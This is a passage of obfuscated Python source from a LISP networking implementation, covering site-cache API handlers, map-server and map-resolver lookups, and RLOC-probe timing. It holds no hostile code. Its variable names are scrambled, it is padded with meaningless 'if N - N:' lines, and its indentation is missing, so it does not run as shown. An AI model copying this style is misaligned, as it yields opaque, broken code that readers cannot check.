if 99 - 99: I1ii11iIi11i + I11i
if 29 - 29: I1ii11iIi11i / oO0o
if 2 - 2: Oo0Ooo / IiII - OoooooooOO
if 65 - 65: OoO0O00 - Ii1I
if 98 - 98: OoOoOO00 * I1Ii111 * iIii1I11I1II1 * OoOoOO00
if 15 - 15: Oo0Ooo
if 100 - 100: IiII + I1ii11iIi11i + iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
def lisp_process_api_site_cache ( se , data ) :
if 84 - 84: o0oOOo0O0Ooo * I11i
if 22 - 22: i1IIi + OOooOOo % OoooooooOO
if 34 - 34: oO0o / O0 - II111iiii % Oo0Ooo + I11i
if 23 - 23: o0oOOo0O0Ooo + i11iIiiIii . I1IiiI + iIii1I11I1II1
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if ( se . source_cache == None ) : return ( [ True , data ] )
if 66 - 66: OoooooooOO
if 90 - 90: IiII - OoOoOO00
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
if 37 - 37: iII111i - Ii1I . oO0o
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
if 25 - 25: oO0o
if 43 - 43: Ii1I - o0oOOo0O0Ooo % oO0o - O0
if 20 - 20: OoO0O00 . ooOoO0o / OoOoOO00 - OoOoOO00 . iII111i / OOooOOo
if 39 - 39: iIii1I11I1II1 % ooOoO0o
if 75 - 75: i1IIi * II111iiii * O0 * i11iIiiIii % iII111i / iII111i
if 36 - 36: IiII / I1IiiI % iII111i / iII111i
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
I1IIIi = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
iiiiII = data [ "dns-name" ] if ( "dns-name" in data ) else None
if ( "address" in data ) :
I1IIIi . store_address ( data [ "address" ] )
if 38 - 38: OOooOOo * I1ii11iIi11i * I1Ii111 + I11i
if 65 - 65: O0 + O0 * I1Ii111
oOO0 = { }
if ( ms_or_mr ) :
for oO00000oOO in list ( lisp_map_servers_list . values ( ) ) :
if ( iiiiII ) :
if ( iiiiII != oO00000oOO . dns_name ) : continue
else :
if ( I1IIIi . is_exact_match ( oO00000oOO . map_server ) == False ) : continue
if 66 - 66: OOooOOo / O0 + i1IIi . O0 % I1ii11iIi11i - OoooooooOO
if 16 - 16: I11i % iII111i
oOO0 [ "dns-name" ] = oO00000oOO . dns_name
oOO0 [ "address" ] = oO00000oOO . map_server . print_address_no_iid ( )
oOO0 [ "ms-name" ] = "" if oO00000oOO . ms_name == None else oO00000oOO . ms_name
return ( [ oOO0 ] )
if 29 - 29: I1IiiI - ooOoO0o * OoO0O00 . i11iIiiIii % OoOoOO00 * o0oOOo0O0Ooo
else :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( iiiiII ) :
if ( iiiiII != iii1i . dns_name ) : continue
else :
if ( I1IIIi . is_exact_match ( iii1i . map_resolver ) == False ) : continue
if 43 - 43: OoO0O00 * OOooOOo / I1Ii111 % OoOoOO00 . oO0o / OOooOOo
if 62 - 62: O0 * I1ii11iIi11i - O0 / I11i % ooOoO0o
oOO0 [ "dns-name" ] = iii1i . dns_name
oOO0 [ "address" ] = iii1i . map_resolver . print_address_no_iid ( )
oOO0 [ "mr-name" ] = "" if iii1i . mr_name == None else iii1i . mr_name
return ( [ oOO0 ] )
if 1 - 1: O0 / iIii1I11I1II1
if 17 - 17: OoOoOO00 + ooOoO0o * II111iiii * OoOoOO00 + I1IiiI + i11iIiiIii
return ( [ ] )
if 46 - 46: i1IIi - II111iiii . I1IiiI . i11iIiiIii
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
if 16 - 16: o0oOOo0O0Ooo
if 3 - 3: i11iIiiIii . I1ii11iIi11i
if 65 - 65: II111iiii * iII111i - OoO0O00 + oO0o % OoO0O00
if 83 - 83: OoooooooOO % I1ii11iIi11i . IiII + OOooOOo . iII111i - ooOoO0o
if 100 - 100: o0oOOo0O0Ooo
def lisp_process_api_database_mapping ( ) :
iiooo0o0oO = [ ]
if 95 - 95: iII111i * oO0o * i1IIi
for OoO0oO in lisp_db_list :
oo0O00OOOOO = { }
oo0O00OOOOO [ "eid-prefix" ] = OoO0oO . eid . print_prefix ( )
if ( OoO0oO . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = OoO0oO . group . print_prefix ( )
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
OOOO00 = [ ]
for iiiI1I in OoO0oO . rloc_set :
iIIiI11 = { }
if ( iiiI1I . rloc . is_null ( ) == False ) :
iIIiI11 [ "rloc" ] = iiiI1I . rloc . print_address_no_iid ( )
if 71 - 71: I1IiiI . OOooOOo . I1ii11iIi11i
if ( iiiI1I . rloc_name != None ) : iIIiI11 [ "rloc-name" ] = iiiI1I . rloc_name
if ( iiiI1I . interface != None ) : iIIiI11 [ "interface" ] = iiiI1I . interface
oo00oOO = iiiI1I . translated_rloc
if ( oo00oOO . is_null ( ) == False ) :
iIIiI11 [ "translated-rloc" ] = oo00oOO . print_address_no_iid ( )
if 18 - 18: iII111i * OoO0O00 % i11iIiiIii
if ( iIIiI11 != { } ) : OOOO00 . append ( iIIiI11 )
if 76 - 76: OoO0O00
if 92 - 92: iIii1I11I1II1 * O0 % I11i
if 92 - 92: OoOoOO00 + oO0o
if 89 - 89: IiII % iII111i / iIii1I11I1II1 . Ii1I . Oo0Ooo + ooOoO0o
if 28 - 28: I1IiiI . iIii1I11I1II1
oo0O00OOOOO [ "rlocs" ] = OOOO00
if 12 - 12: I1Ii111 * OOooOOo
if 11 - 11: II111iiii % O0 % O0 % o0oOOo0O0Ooo
if 45 - 45: OoooooooOO * oO0o
if 74 - 74: ooOoO0o * I11i / oO0o - IiII + OoOoOO00
iiooo0o0oO . append ( oo0O00OOOOO )
if 16 - 16: Oo0Ooo
return ( iiooo0o0oO )
if 29 - 29: Oo0Ooo . I1ii11iIi11i / II111iiii / oO0o / o0oOOo0O0Ooo + I11i
if 4 - 4: OoooooooOO % I1ii11iIi11i . OoO0O00 * o0oOOo0O0Ooo + I1ii11iIi11i * IiII
if 67 - 67: I1IiiI
if 93 - 93: ooOoO0o . Ii1I + IiII / Oo0Ooo % I11i
if 40 - 40: Oo0Ooo % OoOoOO00 . IiII / I1IiiI % OoooooooOO
if 33 - 33: OOooOOo - OoooooooOO . iII111i
if 2 - 2: I11i + i1IIi
def lisp_gather_site_cache_data ( se , data ) :
oo0O00OOOOO = { }
oo0O00OOOOO [ "site-name" ] = se . site . site_name
oo0O00OOOOO [ "instance-id" ] = str ( se . eid . instance_id )
oo0O00OOOOO [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
oo0O00OOOOO [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 52 - 52: I11i - OoO0O00 % I1Ii111 . OOooOOo
oo0O00OOOOO [ "registered" ] = "yes" if se . registered else "no"
oo0O00OOOOO [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
oo0O00OOOOO [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 90 - 90: O0 - Oo0Ooo / i1IIi * iIii1I11I1II1 % o0oOOo0O0Ooo / oO0o
IiI = se . last_registerer
IiI = "none" if IiI . is_null ( ) else IiI . print_address ( )
oo0O00OOOOO [ "last-registerer" ] = IiI
oo0O00OOOOO [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
oo0O00OOOOO [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
oo0O00OOOOO [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
oo0O00OOOOO [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 73 - 73: iII111i % iIii1I11I1II1 + o0oOOo0O0Ooo % Ii1I . II111iiii + IiII
if 55 - 55: OoOoOO00 * II111iiii / iII111i + OOooOOo / OoooooooOO
if 12 - 12: II111iiii * O0 - Oo0Ooo + o0oOOo0O0Ooo . Oo0Ooo + iIii1I11I1II1
if 4 - 4: I1Ii111 - I1Ii111 / I1ii11iIi11i . i1IIi + I1ii11iIi11i / oO0o
if 18 - 18: iIii1I11I1II1 . ooOoO0o
OO00O000OOO = [ ]
for iIIiI11 in se . registered_rlocs :
iiiI1I = { }
iiiI1I [ "address" ] = iIIiI11 . rloc . print_address_no_iid ( ) if iIIiI11 . rloc_exists ( ) else "none"
if 68 - 68: o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo . I11i + I1IiiI * i1IIi % Ii1I + OOooOOo
if ( iIIiI11 . geo ) : iiiI1I [ "geo" ] = iIIiI11 . geo . print_geo ( )
if ( iIIiI11 . elp ) : iiiI1I [ "elp" ] = iIIiI11 . elp . print_elp ( False )
if ( iIIiI11 . rle ) : iiiI1I [ "rle" ] = iIIiI11 . rle . print_rle ( False , True )
if ( iIIiI11 . json ) : iiiI1I [ "json" ] = iIIiI11 . json . print_json ( False )
if ( iIIiI11 . rloc_name ) : iiiI1I [ "rloc-name" ] = iIIiI11 . rloc_name
iiiI1I [ "uptime" ] = lisp_print_elapsed ( iIIiI11 . uptime )
iiiI1I [ "upriority" ] = str ( iIIiI11 . priority )
iiiI1I [ "uweight" ] = str ( iIIiI11 . weight )
iiiI1I [ "mpriority" ] = str ( iIIiI11 . mpriority )
iiiI1I [ "mweight" ] = str ( iIIiI11 . mweight )
if 5 - 5: o0oOOo0O0Ooo % oO0o / OoO0O00
OO00O000OOO . append ( iiiI1I )
if 17 - 17: OoooooooOO - I1ii11iIi11i / OoO0O00 - I1Ii111 + i1IIi
oo0O00OOOOO [ "registered-rlocs" ] = OO00O000OOO
if 6 - 6: Oo0Ooo - II111iiii
data . append ( oo0O00OOOOO )
return ( [ True , data ] )
if 33 - 33: I1Ii111 - I1IiiI + iII111i . OoOoOO00
if 91 - 91: OOooOOo / Ii1I / IiII * OOooOOo
if 68 - 68: I11i
if 91 - 91: I11i
if 24 - 24: ooOoO0o . i1IIi - O0 + I11i
if 71 - 71: OoOoOO00
if 29 - 29: O0 . i11iIiiIii
def lisp_process_api_site_cache_entry ( parms ) :
oooo = parms [ "instance-id" ]
oooo = 0 if ( oooo == "" ) else int ( oooo )
if 51 - 51: IiII
if 53 - 53: O0
if 19 - 19: o0oOOo0O0Ooo / iII111i % OoOoOO00
if 65 - 65: o0oOOo0O0Ooo
o0Ooo0Oooo0o = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
o0Ooo0Oooo0o . store_prefix ( parms [ "eid-prefix" ] )
if 89 - 89: iIii1I11I1II1 + OoooooooOO + i1IIi + OoooooooOO % IiII * OoO0O00
if 53 - 53: OOooOOo . IiII % I11i - OoO0O00 - Oo0Ooo
if 58 - 58: I1Ii111 / OoooooooOO . I11i % I1Ii111
if 8 - 8: Oo0Ooo % ooOoO0o / i11iIiiIii
if 54 - 54: IiII
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
if ( "group-prefix" in parms ) :
oo0oOooo0O . store_prefix ( parms [ "group-prefix" ] )
if 85 - 85: OOooOOo - i1IIi
if 10 - 10: I1ii11iIi11i
iiooo0o0oO = [ ]
ooOO00o = lisp_site_eid_lookup ( o0Ooo0Oooo0o , oo0oOooo0O , False )
if ( ooOO00o ) : lisp_gather_site_cache_data ( ooOO00o , iiooo0o0oO )
return ( iiooo0o0oO )
if 3 - 3: ooOoO0o * O0 / o0oOOo0O0Ooo
if 22 - 22: OoOoOO00 + OOooOOo . iII111i % iIii1I11I1II1 - I11i
if 23 - 23: OoOoOO00 * I1Ii111
if 18 - 18: o0oOOo0O0Ooo % i11iIiiIii . Ii1I . O0
if 85 - 85: I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo * OoO0O00
if 25 - 25: o0oOOo0O0Ooo / Ii1I / Oo0Ooo . ooOoO0o - ooOoO0o * O0
if 14 - 14: O0 - Ii1I + iIii1I11I1II1 + II111iiii . ooOoO0o + Ii1I
def lisp_get_interface_instance_id ( device , source_eid ) :
i111IIiIiiI1 = None
if ( device in lisp_myinterfaces ) :
i111IIiIiiI1 = lisp_myinterfaces [ device ]
if 25 - 25: OoO0O00 * oO0o
if 29 - 29: OOooOOo - I1Ii111 - i11iIiiIii % i1IIi
if 2 - 2: i11iIiiIii % iIii1I11I1II1 * OOooOOo
if 45 - 45: oO0o + i1IIi + iII111i + o0oOOo0O0Ooo * OOooOOo + ooOoO0o
if 83 - 83: OoO0O00 - ooOoO0o / OoooooooOO % iIii1I11I1II1 - II111iiii
if 73 - 73: Oo0Ooo + II111iiii - IiII
if ( i111IIiIiiI1 == None or i111IIiIiiI1 . instance_id == None ) :
return ( lisp_default_iid )
if 60 - 60: i1IIi . i11iIiiIii / i1IIi . I11i % OOooOOo
if 47 - 47: oO0o + IiII * I1Ii111 % o0oOOo0O0Ooo - O0 % IiII
if 66 - 66: II111iiii * I1IiiI . Oo0Ooo * OoooooooOO % OoOoOO00 . II111iiii
if 4 - 4: iII111i + I1Ii111 % OoOoOO00 / Ii1I
if 94 - 94: OoO0O00
if 35 - 35: I1ii11iIi11i % OoO0O00 + II111iiii % II111iiii / IiII - iII111i
if 9 - 9: I1ii11iIi11i * o0oOOo0O0Ooo . oO0o
if 48 - 48: IiII . I1Ii111 + OoooooooOO - I1Ii111 . Ii1I . I1Ii111
if 24 - 24: ooOoO0o * iIii1I11I1II1
oooo = i111IIiIiiI1 . get_instance_id ( )
if ( source_eid == None ) : return ( oooo )
if 1 - 1: I1ii11iIi11i . O0
IiI11I1IIIiIi = source_eid . instance_id
O0O0OO0o0 = None
for i111IIiIiiI1 in lisp_multi_tenant_interfaces :
if ( i111IIiIiiI1 . device != device ) : continue
Oo0OoOI1I11iII1I1i = i111IIiIiiI1 . multi_tenant_eid
source_eid . instance_id = Oo0OoOI1I11iII1I1i . instance_id
if ( source_eid . is_more_specific ( Oo0OoOI1I11iII1I1i ) == False ) : continue
if ( O0O0OO0o0 == None or O0O0OO0o0 . multi_tenant_eid . mask_len < Oo0OoOI1I11iII1I1i . mask_len ) :
O0O0OO0o0 = i111IIiIiiI1
if 57 - 57: I1Ii111 / i11iIiiIii * OoooooooOO % OoooooooOO % i11iIiiIii . Oo0Ooo
if 14 - 14: I1IiiI + o0oOOo0O0Ooo
source_eid . instance_id = IiI11I1IIIiIi
if 5 - 5: I1ii11iIi11i % I11i - II111iiii
if ( O0O0OO0o0 == None ) : return ( oooo )
return ( O0O0OO0o0 . get_instance_id ( ) )
if 70 - 70: ooOoO0o - IiII - OoO0O00 / I11i
if 59 - 59: IiII % ooOoO0o . iII111i / Ii1I * Ii1I
if 73 - 73: I1ii11iIi11i . oO0o % I11i . I1ii11iIi11i / I1Ii111 / II111iiii
if 23 - 23: OoooooooOO . o0oOOo0O0Ooo
if 76 - 76: I1Ii111
if 91 - 91: iIii1I11I1II1 / Ii1I . I1IiiI
if 63 - 63: ooOoO0o . Ii1I - I1Ii111 - oO0o * I1Ii111 + ooOoO0o
if 85 - 85: II111iiii + I1ii11iIi11i
if 33 - 33: iII111i
def lisp_allow_dynamic_eid ( device , eid ) :
if ( device not in lisp_myinterfaces ) : return ( None )
if 14 - 14: O0 * Oo0Ooo / i1IIi
i111IIiIiiI1 = lisp_myinterfaces [ device ]
Oo0o00OOo0 = device if i111IIiIiiI1 . dynamic_eid_device == None else i111IIiIiiI1 . dynamic_eid_device
if 26 - 26: OOooOOo / OoooooooOO . i1IIi % o0oOOo0O0Ooo - I1Ii111
if 65 - 65: i1IIi % o0oOOo0O0Ooo - Oo0Ooo + OOooOOo - oO0o
if ( i111IIiIiiI1 . does_dynamic_eid_match ( eid ) ) : return ( Oo0o00OOo0 )
return ( None )
if 30 - 30: iII111i
if 91 - 91: OoooooooOO . OoO0O00 % ooOoO0o + I1ii11iIi11i % iIii1I11I1II1
if 48 - 48: I1IiiI . OoooooooOO . i11iIiiIii / i1IIi % ooOoO0o * O0
if 1 - 1: I1ii11iIi11i
if 85 - 85: I1ii11iIi11i
if 6 - 6: IiII % ooOoO0o . IiII . I1Ii111 - iIii1I11I1II1 + iIii1I11I1II1
if 30 - 30: OoooooooOO - ooOoO0o + Ii1I
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 88 - 88: II111iiii / Oo0Ooo . Oo0Ooo % o0oOOo0O0Ooo * OoOoOO00 . I1ii11iIi11i
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 32 - 32: OoooooooOO * I11i
o00ooOOOo = lisp_process_rloc_probe_timer
oo0O00O0O0O00Ooo = threading . Timer ( interval , o00ooOOOo , [ lisp_sockets ] )
lisp_rloc_probe_timer = oo0O00O0O0O00Ooo
oo0O00O0O0O00Ooo . start ( )
return
if 80 - 80: iII111i / I1Ii111 * Oo0Ooo
if 6 - 6: o0oOOo0O0Ooo - IiII . iII111i
if 3 - 3: II111iiii
if 79 - 79: i11iIiiIii
if 7 - 7: I11i - OoOoOO00 % I11i . i11iIiiIii
if 28 - 28: oO0o * i11iIiiIii * i11iIiiIii % OoooooooOO / I1IiiI / II111iiii
if 36 - 36: ooOoO0o % i1IIi . ooOoO0o % oO0o % O0 . II111iiii
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for III in lisp_rloc_probe_list :
oOoO00OoO0 = lisp_rloc_probe_list [ III ]
lprint ( "RLOC {}:" . format ( III ) )
for iiiI1I , oO0ooOOO , Oo in oOoO00OoO0 :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( iiiI1I ) ) , oO0ooOOO . print_prefix ( ) ,
Oo . print_prefix ( ) , iiiI1I . translated_port ) )
if 83 - 83: I11i
if 39 - 39: o0oOOo0O0Ooo * iIii1I11I1II1
lprint ( bold ( "---------------------------" , False ) )
return
if 13 - 13: iII111i + Oo0Ooo / oO0o / OOooOOo
if 58 - 58: oO0o * I1ii11iIi11i % I1ii11iIi11i
if 16 - 16: I11i / I1IiiI % I1IiiI
if 78 - 78: O0 % i11iIiiIii / IiII
if 87 - 87: IiII % iIii1I11I1II1 * I1ii11iIi11i
if 43 - 43: Ii1I - IiII / i11iIiiIii + OoOoOO00 + I1ii11iIi11i - o0oOOo0O0Ooo
if 39 - 39: OoOoOO00 - i1IIi / oO0o % I11i * o0oOOo0O0Ooo * I1IiiI
if 79 - 79: Ii1I
if 56 - 56: I1ii11iIi11i
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 40 - 40: OoooooooOO
if 100 - 100: IiII - I11i
if 79 - 79: iII111i % O0
if 73 - 73: Oo0Ooo
iIIiI11 , oO0ooOOO , Oo = eid_list [ 0 ]
iI1ii11I = [ lisp_print_eid_tuple ( oO0ooOOO , Oo ) ]
if 19 - 19: O0 + OoO0O00 - i1IIi % OoOoOO00 / Oo0Ooo + OoooooooOO
for iIIiI11 , oO0ooOOO , Oo in eid_list [ 1 : : ] :
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
iI1ii11I . append ( lisp_print_eid_tuple ( oO0ooOOO , Oo ) )
if 93 - 93: i11iIiiIii % OOooOOo . I11i * ooOoO0o
if 90 - 90: OoO0O00
O00OOO0 = bold ( "unreachable" , False )
IIIOo0O = red ( iIIiI11 . rloc . print_address_no_iid ( ) , False )
if 12 - 12: ooOoO0o % i11iIiiIii * I1IiiI - IiII . o0oOOo0O0Ooo % i11iIiiIii
for o0Ooo0Oooo0o in iI1ii11I :
oO0ooOOO = green ( o0Ooo0Oooo0o , False )
lprint ( "RLOC {} went {} for EID {}" . format ( IIIOo0O , O00OOO0 , oO0ooOOO ) )
if 84 - 84: OOooOOo
if 35 - 35: I1IiiI . ooOoO0o - O0
if 63 - 63: Ii1I
if 9 - 9: iIii1I11I1II1 / OOooOOo * O0 . Oo0Ooo + OoO0O00
if 95 - 95: I11i . o0oOOo0O0Ooo + O0
if 36 - 36: I1IiiI * ooOoO0o
for iIIiI11 , oO0ooOOO , Oo in eid_list :
I11iiI1III = lisp_map_cache . lookup_cache ( oO0ooOOO , True )
if ( I11iiI1III ) : lisp_write_ipc_map_cache ( True , I11iiI1III )
if 74 - 74: I1IiiI - ooOoO0o / I1ii11iIi11i
return
if 82 - 82: II111iiii % OoOoOO00
if 32 - 32: i11iIiiIii
if 38 - 38: IiII + I1Ii111 % Ii1I / Ii1I
if 39 - 39: iII111i * i11iIiiIii
if 31 - 31: IiII - Ii1I . i1IIi
if 1 - 1: o0oOOo0O0Ooo + OOooOOo % Ii1I - O0 / I1ii11iIi11i
if 20 - 20: o0oOOo0O0Ooo + II111iiii * Ii1I . OoooooooOO
if 88 - 88: O0 + iIii1I11I1II1 . o0oOOo0O0Ooo . iIii1I11I1II1 - Ii1I
if 74 - 74: Ii1I . IiII
if 67 - 67: oO0o
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 12 - 12: I1IiiI + OoooooooOO
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 25 - 25: iIii1I11I1II1 - I1IiiI . i11iIiiIii + ooOoO0o
if 19 - 19: OoooooooOO / IiII
if 40 - 40: OoOoOO00 / OoooooooOO * iIii1I11I1II1 / i1IIi . OoooooooOO
if 88 - 88: I1IiiI % I1IiiI / II111iiii - IiII
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 72 - 72: OoO0O00 - I1ii11iIi11i . Oo0Ooo / OoO0O00
if 86 - 86: i11iIiiIii - oO0o . i11iIiiIii
if 51 - 51: OoO0O00 - OoO0O00 * IiII
if 24 - 24: OoooooooOO . II111iiii
ooi1I = lisp_get_default_route_next_hops ( )
if 74 - 74: II111iiii * O0
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 57 - 57: OoO0O00
if 12 - 12: o0oOOo0O0Ooo . I1Ii111 . oO0o % Oo0Ooo * OoooooooOO
if 25 - 25: OoO0O00
if 54 - 54: O0
if 20 - 20: ooOoO0o + Oo0Ooo - Oo0Ooo
O0oo0oOo = 0
Oooooo0OOO = bold ( "RLOC-probe" , False )
for Iii1iIi1i in list ( lisp_rloc_probe_list . values ( ) ) :
if 60 - 60: OOooOOo * iII111i . ooOoO0o + O0 + o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 62 - 62: O0 * OoO0O00 / Oo0Ooo - oO0o * OoO0O00 * oO0o
if 31 - 31: Oo0Ooo
if 90 - 90: I11i . IiII * iIii1I11I1II1 . I11i + i1IIi
if 67 - 67: I1Ii111 . I1ii11iIi11i
ii11ii1 = None
for oO00O , o0Ooo0Oooo0o , oo0oOooo0O in Iii1iIi1i :
O0O0 = oO00O . rloc . print_address_no_iid ( )
if 46 - 46: i11iIiiIii - Ii1I / OoooooooOO - OoO0O00
if 36 - 36: Ii1I * ooOoO0o * OoooooooOO + OoOoOO00
if 43 - 43: I1Ii111 - Oo0Ooo % i1IIi . II111iiii
if 80 - 80: IiII . iII111i + I1Ii111 + iII111i % Oo0Ooo
Ooo00O , ooiiIIiii , ii1I1I1iII = lisp_allow_gleaning ( o0Ooo0Oooo0o , None , oO00O )
if ( Ooo00O and ooiiIIiii == False ) :
oO0ooOOO = green ( o0Ooo0Oooo0o . print_address ( ) , False )
O0O0 += ":{}" . format ( oO00O . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( O0O0 , False ) , oO0ooOOO ) )
if 58 - 58: OOooOOo - o0oOOo0O0Ooo * iII111i % o0oOOo0O0Ooo % O0 / II111iiii
continue
if 39 - 39: ooOoO0o + I11i
if 24 - 24: o0oOOo0O0Ooo
if 5 - 5: i11iIiiIii - oO0o + o0oOOo0O0Ooo % ooOoO0o
if 63 - 63: oO0o
if 7 - 7: IiII / i11iIiiIii - OOooOOo
if 9 - 9: II111iiii + i11iIiiIii % I1Ii111 - Oo0Ooo * OOooOOo
if 55 - 55: I1Ii111 + ooOoO0o
if ( oO00O . down_state ( ) ) : continue
if 58 - 58: iII111i . I1ii11iIi11i - Oo0Ooo % o0oOOo0O0Ooo + I1Ii111
if 58 - 58: oO0o . ooOoO0o . I1IiiI . Oo0Ooo * iIii1I11I1II1 - iII111i
if 96 - 96: OOooOOo % o0oOOo0O0Ooo / iIii1I11I1II1
if 60 - 60: i1IIi / iIii1I11I1II1 + I11i % iII111i
if 64 - 64: I11i . i11iIiiIii / iIii1I11I1II1 . I11i
if 73 - 73: OoO0O00 % iIii1I11I1II1 + IiII * I1Ii111 % II111iiii
if 20 - 20: I11i % I1ii11iIi11i . OoO0O00 % OoOoOO00
if 84 - 84: OoooooooOO / i11iIiiIii . IiII / I1IiiI
if 62 - 62: iII111i - I1IiiI + OoooooooOO
if 59 - 59: iIii1I11I1II1 + i11iIiiIii * oO0o . Oo0Ooo . I1Ii111
if 49 - 49: II111iiii
if ( ii11ii1 ) :
oO00O . last_rloc_probe_nonce = ii11ii1 . last_rloc_probe_nonce
if 99 - 99: Oo0Ooo . OOooOOo
if ( ii11ii1 . translated_port == oO00O . translated_port and ii11ii1 . rloc_name == oO00O . rloc_name ) :
if 85 - 85: OoOoOO00 . IiII + oO0o - II111iiii
oO0ooOOO = green ( lisp_print_eid_tuple ( o0Ooo0Oooo0o , oo0oOooo0O ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( O0O0 , False ) , oO0ooOOO ) )
if 70 - 70: O0 % I1Ii111
if 13 - 13: I1ii11iIi11i % OoO0O00 / Ii1I * IiII
if 82 - 82: ooOoO0o % Oo0Ooo
if 26 - 26: OoO0O00 + i11iIiiIii % I11i . I1ii11iIi11i
if 76 - 76: i1IIi + ooOoO0o - Oo0Ooo + OoOoOO00 / I1ii11iIi11i . OOooOOo
if 50 - 50: IiII - Ii1I % iIii1I11I1II1
oO00O . last_rloc_probe = ii11ii1 . last_rloc_probe
continue
if 60 - 60: o0oOOo0O0Ooo - Oo0Ooo
if 92 - 92: OoOoOO00 + IiII . OoO0O00 % iII111i / II111iiii / I11i
if 62 - 62: I1ii11iIi11i
OoII1 = None
iIIiI11 = None
while ( True ) :
iIIiI11 = oO00O if iIIiI11 == None else iIIiI11 . next_rloc
if ( iIIiI11 == None ) : break
if 100 - 100: iII111i / ooOoO0o / IiII % II111iiii
if 6 - 6: OoooooooOO - I1IiiI + OoooooooOO
if 89 - 89: oO0o % Oo0Ooo . O0 . ooOoO0o
if 46 - 46: IiII * I11i - OoO0O00 - Ii1I
if 93 - 93: iIii1I11I1II1 / o0oOOo0O0Ooo - I11i - OOooOOo % ooOoO0o
if ( iIIiI11 . rloc_next_hop != None ) :
if ( iIIiI11 . rloc_next_hop not in ooi1I ) :
if ( iIIiI11 . up_state ( ) ) :
IiI11I111 , iii1111ii = iIIiI11 . rloc_next_hop
iIIiI11 . state = LISP_RLOC_UNREACH_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
if 16 - 16: ooOoO0o * o0oOOo0O0Ooo - IiII + I1ii11iIi11i / o0oOOo0O0Ooo - O0
O00OOO0 = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( iii1111ii , IiI11I111 ,
red ( O0O0 , False ) , O00OOO0 ) )
continue
if 71 - 71: i1IIi
if 79 - 79: iII111i * O0 / Ii1I / O0 % i1IIi
if 52 - 52: OoooooooOO % oO0o - I11i % OoOoOO00 . II111iiii
if 62 - 62: Ii1I . I1ii11iIi11i . iII111i + I11i * o0oOOo0O0Ooo
if 56 - 56: oO0o * iIii1I11I1II1 . II111iiii - II111iiii + II111iiii - i11iIiiIii
if 79 - 79: iII111i
i11iII11I1III = iIIiI11 . last_rloc_probe
I1i1IIIi1iii = 0 if i11iII11I1III == None else time . time ( ) - i11iII11I1III
if ( iIIiI11 . unreach_state ( ) and I1i1IIIi1iii < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( O0O0 , False ) ) )
if 43 - 43: OoOoOO00
continue
if 99 - 99: OoO0O00 - O0 * OoO0O00 + OoO0O00
if 62 - 62: IiII - I1Ii111
if 68 - 68: Oo0Ooo + oO0o - OoO0O00
if 17 - 17: I11i % I1ii11iIi11i - I1IiiI % oO0o + I1ii11iIi11i
if 68 - 68: i1IIi . ooOoO0o . Oo0Ooo + iII111i . I1IiiI * i1IIi
if 88 - 88: iII111i + i11iIiiIii
I111Ii1I1I1iI = lisp_get_echo_nonce ( None , O0O0 )
if ( I111Ii1I1I1iI and I111Ii1I1I1iI . request_nonce_timeout ( ) ) :
iIIiI11 . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
iIIiI11 . last_state_change = lisp_get_timestamp ( )
O00OOO0 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( O0O0 , False ) , O00OOO0 ) )
if 42 - 42: I1Ii111 * O0 / OoO0O00 + iII111i
lisp_update_rtr_updown ( iIIiI11 . rloc , False )
continue
if 86 - 86: OOooOOo
if 6 - 6: oO0o % iII111i * Oo0Ooo - i11iIiiIii . OoooooooOO
if 85 - 85: O0 * i1IIi
